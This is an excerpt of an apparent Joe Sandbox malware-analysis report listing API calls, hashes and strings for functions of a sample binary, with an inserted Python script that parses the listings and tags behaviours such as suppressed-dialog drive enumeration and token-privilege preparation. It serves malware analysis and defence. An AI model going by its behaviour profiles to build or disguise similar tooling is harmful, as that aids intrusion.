                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
• Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
• Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
• Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
• Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
• Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 004604B5
• GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
• _wcslen.LIBCMT ref: 00460502
• CharUpperBuffW.USER32(?,00000000), ref: 00460510
• GetClassNameW.USER32(?,?,00000400), ref: 00460589
• GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
• GetClassNameW.USER32(?,?,00000400), ref: 00460606
• GetClassNameW.USER32(?,?,00000400), ref: 0046063E
• GetWindowRect.USER32(?,?), ref: 004606AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
• String ID: ThumbnailClass
• API String ID: 4123061591-1241985126
• Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
• Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
APIs
  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
• DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
• ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
• ImageList_EndDrag.COMCTL32 ref: 0046F583
• ReleaseCapture.USER32 ref: 0046F589
• SetWindowTextW.USER32(?,00000000), ref: 0046F620
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2483343779-2060113733
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
• SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
• GetClientRect.USER32(?,?), ref: 0046FEF2
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
• DestroyIcon.USER32(?), ref: 0046FFCC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
• String ID: 2
• API String ID: 1331449709-450215437
• Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
• Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
• Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
• Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
• OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
• GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
• LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
• LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
• _memcmp.LIBCMT ref: 004394A9
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
Strings
• SeAssignPrimaryTokenPrivilege, xrefs: 00439455
• SeIncreaseQuotaPrivilege, xrefs: 0043946A
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
• String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
• API String ID: 1446985595-805462909
• Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
• Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2907320926-41864084
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1932665248-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
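The per-function "APIs" and "Similarity" listings above (the SetErrorMode/GetDriveTypeW block, the SafeArray block with its "Part of subcall function" lines, the privilege-name String ID, and the ListView SendMessageW block that follows) are the raw material for triage, but a report of this size has thousands of them. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses those bullet lines into call records and tags each function with the behaviours an analyst would look for. The tagging rules encode only documented Windows facts (SetErrorMode flag 1 is SEM_FAILCRITICALERRORS, which suppresses the "insert disk" dialog while drives are probed; SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege are the two privileges CreateProcessAsUser requires; SendMessageW messages in the 0x1000 range are ListView LVM_* messages). The sample text is assembled from lines on this page; the function and tag names are this example's own.

```python
"""Parse Joe Sandbox per-function 'APIs' / 'Similarity' listings into
behaviour tags. Added example; not code from the report or the sandbox."""
import re
from dataclasses import dataclass, field
from typing import Optional

SEM_FAILCRITICALERRORS = 0x0001   # SetErrorMode flag: no "insert disk" dialogs
LVM_FIRST = 0x1000                # base of the ListView LVM_* message range
CREATEPROCESSASUSER_PRIVS = {"SeAssignPrimaryTokenPrivilege",
                             "SeIncreaseQuotaPrivilege"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                      # call-site address from the 'ref:' field
    subcall_of: Optional[int] = None   # set for 'Part of subcall function' lines

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""

# One report bullet, e.g. "• SetErrorMode.KERNEL32(00000001), ref: 0045D848"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

def parse_blocks(text: str) -> list:
    """A block starts at 'APIs' (or at a leading 'API ID' line when the call
    list is off-page) and absorbs the Similarity IDs that follow it."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (cur is None and line.startswith("• API ID:")):
            cur = FunctionBlock()
            blocks.append(cur)
            if line == "APIs":
                continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
    return blocks

def _hex(arg: str) -> Optional[int]:
    """Report arguments are hex or '?' when the value was not recovered."""
    return None if arg == "?" else int(arg, 16)

def classify(block: FunctionBlock) -> dict:
    names = [c.name for c in block.calls]
    tags = {"drive_enum": "GetDriveTypeW" in names,
            "fail_critical_first": False,
            "createprocessasuser_privs":
                CREATEPROCESSASUSER_PRIVS <= set(block.string_id.split("$")),
            "safearray": any(n.startswith("SafeArray") for n in names),
            "listview_msgs": []}
    if tags["drive_enum"]:
        # Was SEM_FAILCRITICALERRORS set at a call site before the first probe?
        gdt = min(c.ref for c in block.calls if c.name == "GetDriveTypeW")
        tags["fail_critical_first"] = any(
            c.name == "SetErrorMode" and c.args and c.ref < gdt
            and (_hex(c.args[0]) or 0) & SEM_FAILCRITICALERRORS
            for c in block.calls)
    for c in block.calls:
        if c.name == "SendMessageW" and len(c.args) > 1:
            msg = _hex(c.args[1])          # second argument is uMsg
            if msg is not None and LVM_FIRST <= msg < LVM_FIRST + 0x100:
                tags["listview_msgs"].append(msg)
    tags["listview_msgs"] = sorted(set(tags["listview_msgs"]))
    return tags

# Constructed sample: lines copied from this report's function listings.
SAMPLE_REPORT = """\
Similarity
• API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
• String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D848
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
Strings
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
APIs
• SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
• SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
Similarity
• API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
• GetWindowLongW.USER32(?,000000F0), ref: 004481A7
• _memset.LIBCMT ref: 004481BA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
"""

if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE_REPORT)):
        print(i, b.api_id[:40], classify(b))
```

Run over the whole report, the `fail_critical_first` tag separates a benign drive probe from the dialog-suppressed enumeration loop stealers use, and the `createprocessasuser_privs` tag picks out the function that prepares a token for launching a process as another user even when its own call list sits on a different page.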
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
• GetWindowLongW.USER32(?,000000F0), ref: 004481A7
• _memset.LIBCMT ref: 004481BA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
• SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 830647256-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00490000), ref: 0046EB4F
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(004E004F), ref: 0046EB67
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(A8DBEC3E), ref: 0046EB7F
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00750050), ref: 0046EB97
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
